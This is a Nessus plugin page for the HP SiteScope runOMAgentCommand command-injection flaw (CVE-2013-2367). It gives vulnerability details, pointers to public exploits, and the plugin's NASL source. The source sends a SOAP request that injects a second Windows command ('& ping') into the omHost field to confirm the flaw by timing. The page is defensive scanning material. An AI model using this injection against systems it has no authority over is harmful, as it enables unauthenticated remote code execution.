HP SiteScope SOAP Call runOMAgentCommand SOAP Request Arbitrary Remote Code Execution - Nessus
Critical Plugin ID: 69983This page contains detailed information about the HP SiteScope SOAP Call runOMAgentCommand SOAP Request Arbitrary Remote Code Execution Nessus plugin including available exploits and PoCs found on GitHub, in Metasploit or Exploit-DB for verifying of this vulnerability.
Plugin Overview
ID: 69983
Name: HP SiteScope SOAP Call runOMAgentCommand SOAP Request Arbitrary Remote Code Execution
Filename: hp_sitescope_runomagentcommand.nasl
Vulnerability Published: 2013-07-29
This Plugin Published: 2013-09-19
Last Modification Time: 2021-01-19
Plugin Version: 1.16
Plugin Type: remote
Plugin Family: CGI abuses
Dependencies:
hp_sitescope_detect.nasl, os_fingerprint.nasl
Required KB Items [?]: www/sitescope
Vulnerability Information
Severity: Critical
Vulnerability Published: 2013-07-29
Patch Published: 2013-07-29
CVE [?]: CVE-2013-2367
CPE [?]: cpe:/a:hp:sitescope
Synopsis
A web application on the remote host has a Windows command injection vulnerability.
Description
The version of HP SiteScope hosted on the remote web server has a Windows command injection vulnerability. The application hosts a web service that allows the runOMAgentCommand() method to be invoked without authentication. A remote, unauthenticated attacker could exploit this to run arbitrary Windows commands.
Solution
Upgrade to HP SiteScope 11.22 or later.
Public Exploits
Target Network Port(s): 8080
Target Asset(s): Services/www
Exploit Available: True (Metasploit Framework, Exploit-DB, Immunity Canvas, Core Impact, D2 Elliot)
Exploit Ease: Exploits are available
Here's the list of publicly known exploits and PoCs for verifying the HP SiteScope SOAP Call runOMAgentCommand SOAP Request Arbitrary Remote Code Execution vulnerability:
- Metasploit: exploit/multi/http/hp_sitescope_uploadfileshandler
[HP SiteScope Remote Code Execution] - Metasploit: exploit/windows/http/hp_sitescope_runomagentcommand
[HP SiteScope Remote Code Execution] - Exploit-DB: exploits/windows/remote/28188.rb
[EDB-28188: HP SiteScope (Windows) - Remote Code Execution (Metasploit)] - D2 Elliot: hp_sitescope_runomagentcommand_11.20_rce.html
[HP SiteScope runOMAgentCommand 11.20 RCE] - Immunity Canvas: D2ExploitPack
Before running any exploit against any system, make sure you are authorized by the owner of the target system(s) to perform such activity. In any other case, this would be considered as an illegal activity.
WARNING: Beware of using unverified exploits from sources such as GitHub or Exploit-DB. These exploits and PoCs could contain malware. For more information, see how to use exploits safely.
Risk Information
CVSS V2 Vector [?]: AV:N/AC:L/Au:N/C:C/I:C/A:C/E:F/RL:OF/RC:C
| CVSS Base Score: | 10.0 (High) |
| Impact Subscore: | 10.0 |
| Exploitability Subscore: | 10.0 |
| CVSS Temporal Score: | 8.3 (High) |
| CVSS Environmental Score: | NA (None) |
| Modified Impact Subscore: | NA |
| Overall CVSS Score: | 8.3 (High) |
Go back to menu.
Plugin Source
This is the hp_sitescope_runomagentcommand.nasl nessus plugin source code. This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description)
{
script_id(69983);
script_version("1.16");
script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/19");
script_cve_id("CVE-2013-2367");
script_bugtraq_id(61506);
script_name(english:"HP SiteScope SOAP Call runOMAgentCommand SOAP Request Arbitrary Remote Code Execution");
script_summary(english:"Tries to issue runOMAgentCommand SOAP call");
script_set_attribute(
attribute:"synopsis",
value:
"A web application on the remote host has a Windows command injection
vulnerability."
);
script_set_attribute(
attribute:"description",
value:
"The version of HP SiteScope hosted on the remote web server has a
Windows command injection vulnerability. The application hosts a web
service that allows the runOMAgentCommand() method to be invoked without
authentication. A remote, unauthenticated attacker could exploit this
to run arbitrary Windows commands."
);
script_set_attribute(attribute:"see_also", value:"https://www.zerodayinitiative.com/advisories/ZDI-13-205/");
# https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-c03861260-1
script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?4a20c50c");
script_set_attribute(attribute:"solution", value:"Upgrade to HP SiteScope 11.22 or later.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"exploit_framework_core", value:"true");
script_set_attribute(attribute:"d2_elliot_name", value:"HP SiteScope runOMAgentCommand 11.20 RCE");
script_set_attribute(attribute:"exploit_framework_d2_elliot", value:"true");
script_set_attribute(attribute:"metasploit_name", value:'HP SiteScope Remote Code Execution');
script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
script_set_attribute(attribute:"canvas_package", value:'D2ExploitPack');
script_set_attribute(attribute:"vuln_publication_date", value:"2013/07/29");
script_set_attribute(attribute:"patch_publication_date", value:"2013/07/29");
script_set_attribute(attribute:"plugin_publication_date", value:"2013/09/19");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"cpe:/a:hp:sitescope");
script_set_attribute(attribute:"exploited_by_nessus", value:"true");
script_end_attributes();
script_category(ACT_ATTACK);
script_family(english:"CGI abuses");
script_copyright(english:"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_dependencies("hp_sitescope_detect.nasl", "os_fingerprint.nasl");
script_require_keys("www/sitescope");
script_require_ports("Services/www", 8080);
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("webapp_func.inc");
port = get_http_port(default:8080);
install = get_install_from_kb(appname:'sitescope', port:port, exit_on_fail:TRUE);
# We don't test for non-Windows
if (report_paranoia < 2)
{
os = get_kb_item_or_exit('Host/OS');
if ('Windows' >!< os) exit(0, 'This plugin does not run against a non-Windows host.');
}
http_disable_keep_alive();
hdr = make_array('SOAPAction', '""');
url = install['dir'] + '/services/APIBSMIntegrationImpl';
# Our injected command will consume <delay> seconds run time
delay = 20;
xml = '<?xml version="1.0" encoding="UTF-8"?>
<soapenv:Envelope
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<soapenv:Body>
<ns1:runOMAgentCommand
soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:ns1="http://Api.freshtech.COM">
<properties href="#id0"/>
<command xsi:type="xsd:string">OPCACTIVATE</command>
</ns1:runOMAgentCommand>
<multiRef id="id0"
soapenc:root="0"
soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"
xsi:type="ns2:Map"
xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:ns2="http://xml.apache.org/xml-soap">
<item>
<key xsi:type="soapenc:string">omHost</key>
<value xsi:type="soapenc:string">"127.0.0.1 & ping -n ' + delay + ' localhost"</value>
</item>
</multiRef>
</soapenv:Body>
</soapenv:Envelope>';
# This plugin causes remote host to run:
# 1) cscript.exe C:\Program Files\HP\HP BTO Software\bin\OpC\install\opactivate.vbs
# 2) and the Windows command(s) we injected
#
# The remote server does not return an HTTP response until these programs return.
# On a host with HP Operations Agent installed, if the "OpenView Ctrl Service" is not started,
# the opactivate.vbs script will try to start the service, this can take some time (seen > 30 seconds)
#
# The run time for opcactivate.vbs may not be deterministic.
# Here we set a reasonably long timeout so that we can get a response
http_set_read_timeout(150 + delay);
#
# It seems the affected version is vulnerable only if HP Operations Agent is installed.
# The Agent installation is part of HP SiteScope installation, and by default is not installed.
#
# When the Agent is not installed, C:\Program Files\HP\HP BTO Software\bin\OpC\install\opactivate.vbs is not present,
# and our injected command is not run. In this case, the response time for the POST request is significantly faster.
#
# The vulnerable server will take at least <delay> seconds to respond.
#
#
for (i = 0; i < 2; i++)
{
t1 = unixtime();
res = http_send_recv3(
method:'POST',
item:url,
port:port,
data:xml,
add_headers:hdr,
content_type:'text/xml; charset=utf-8',
exit_on_fail:TRUE
);
t2 = unixtime();
resp_time = t2 - t1;
# No response
if (isnull(res[0])) audit(AUDIT_RESP_NOT, port);
# Missing response body
if (isnull(res[2])) audit(AUDIT_RESP_BAD, port);
# Non-affected version returns HTTP status code 500
if (res[0] =~ '^HTTP/[0-9]+\\.[0-9]+ 500') audit(AUDIT_WEB_APP_NOT_AFFECTED, 'SiteScope', build_url(qs:install['dir'], port:port));
# Unexpected response
# Vulnerable version should return status 200 and contain 'runOMAgentCommandResponse' in the response body
if (! (res[0] =~ '^HTTP/[0-9]+\\.[0-9]+ 200' && res[2] =~ 'runOMAgentCommandResponse')) audit(AUDIT_RESP_BAD, port);
# Faster response
# HP Operations Agent likely not installed and thus not vulnerable
if (resp_time < delay) audit(AUDIT_WEB_APP_NOT_AFFECTED, 'SiteScope', build_url(qs:install['dir'], port:port));
# Wait a bit before next trial run
sleep(1);
}
report = NULL;
if (report_verbosity > 0)
{
snip = crap(data:"-", length:30)+' snip '+ crap(data:"-", length:30);
report = 'Nessus was able to verify the vulnerability with the following request :\n' +
snip + '\n' +
http_last_sent_request() + '\n' +
snip;
}
# Server takes at least <delay> seconds to respond for each of the several requests; likely vulnerable
security_hole(port:port, extra:report);
The latest version of this script can be found in these locations depending on your platform:
- Linux / Unix:
/opt/nessus/lib/nessus/plugins/hp_sitescope_runomagentcommand.nasl - Windows:
C:\ProgramData\Tenable\Nessus\nessus\plugins\hp_sitescope_runomagentcommand.nasl - Mac OS X:
/Library/Nessus/run/lib/nessus/plugins/hp_sitescope_runomagentcommand.nasl
Go back to menu.
How to Run
Here is how to run the HP SiteScope SOAP Call runOMAgentCommand SOAP Request Arbitrary Remote Code Execution as a standalone plugin via the Nessus web user interface (https://localhost:8834/):
- Click to start a New Scan.
- Select Advanced Scan.
- Navigate to the Plugins tab.
- On the top right corner click to Disable All plugins.
- On the left side table select CGI abuses plugin family.
- On the right side table select HP SiteScope SOAP Call runOMAgentCommand SOAP Request Arbitrary Remote Code Execution plugin ID 69983.
- Specify the target on the Settings tab and click to Save the scan.
- Run the scan.
Here are a few examples of how to run the plugin in the command line. Note that the examples below demonstrate the usage on the Linux / Unix platform.
Basic usage:
/opt/nessus/bin/nasl hp_sitescope_runomagentcommand.nasl -t <IP/HOST>Run the plugin with audit trail message on the console:
/opt/nessus/bin/nasl -a hp_sitescope_runomagentcommand.nasl -t <IP/HOST>Run the plugin with trace script execution written to the console (useful for debugging):
/opt/nessus/bin/nasl -T - hp_sitescope_runomagentcommand.nasl -t <IP/HOST>Run the plugin with using a state file for the target and updating it (useful for running multiple plugins on the target):
/opt/nessus/bin/nasl -K /tmp/state hp_sitescope_runomagentcommand.nasl -t <IP/HOST>Go back to menu.
References
BID | SecurityFocus Bugtraq ID: See also:
- https://www.tenable.com/plugins/nessus/69983
- https://www.zerodayinitiative.com/advisories/ZDI-13-205/
- http://www.nessus.org/u?4a20c50c
- https://vulners.com/nessus/HP_SITESCOPE_RUNOMAGENTCOMMAND.NASL
- 69195 - HP SiteScope Multiple Unspecified Remote Code Execution Vulnerabilities
- 76284 - HP AutoPass License Server Remote Code Execution (HPSBMU03045)
- 57700 - HP Managed Printing Administration < 2.6.4 Multiple Vulnerabilities
- 57701 - HP Managed Printing Administration jobDelivery Script Directory Traversal (intrusive check)
- 93844 - HP Network Automation RMI Registry Java Object Deserialization RCE
- 76776 - HP OneView < 1.10 OpenSSL Multiple Vulnerabilities (HPSBGN03068)
- 43155 - HP OpenView Network Node Manager Multiple Scripts hostname Parameter Remote Command Execution
- 51850 - HP OpenView Performance Insight Server Backdoor Account
- 90099 - HP Operations Orchestration 10.x < 10.51 Java Object Deserialization RCE
- 44109 - HP Power Manager < 4.2.10
- 62099 - HP SiteScope getFileInternal Arbitrary File Download
- 101299 - HP SiteScope Multiple Vulnerabilities (HPESBGN03763)
- 79719 - HP SiteScope SSLv3 Padding Oracle On Downgraded Legacy Encryption Vulnerability (POODLE)
- 76769 - HP Smart Update Manager 6.x < 6.4.1 Multiple Vulnerabilities
- 81917 - HP Universal Configuration Management Database Server Authentication Bypass
- 102803 - HP iLO 4 <= 2.52 RCE
- 140770 - HP iLO 3 < 1.93 / HP iLO 4 < 2.75 / HP iLO Superdome 4 < 1.64 / HP iLO 5 < 2.18 / HP Moonshot/Edgeline iLO 5 < 2.30 Ripple20 Multiple vulnerabilities
- 29249 - HP OpenView Network Node Manager Multiple CGI Remote Overflows
- 19555 - HP OpenView Network Node Manager Multiple Scripts Remote Command Execution
- 51645 - HP OpenView Network Node Manager Remote Execution of Arbitrary Code (HPSBMA02621 SSRT100352)
- 35657 - HP OpenView Network Node Manager webappmon.exe Command Injection (c01661610)
Version
This page has been produced using Nessus Professional 10.1.2 (#68) LINUX, Plugin set 202205072148.
Plugin file hp_sitescope_runomagentcommand.nasl version 1.16. For more plugins, visit the Nessus Plugin Library.
Go back to menu.
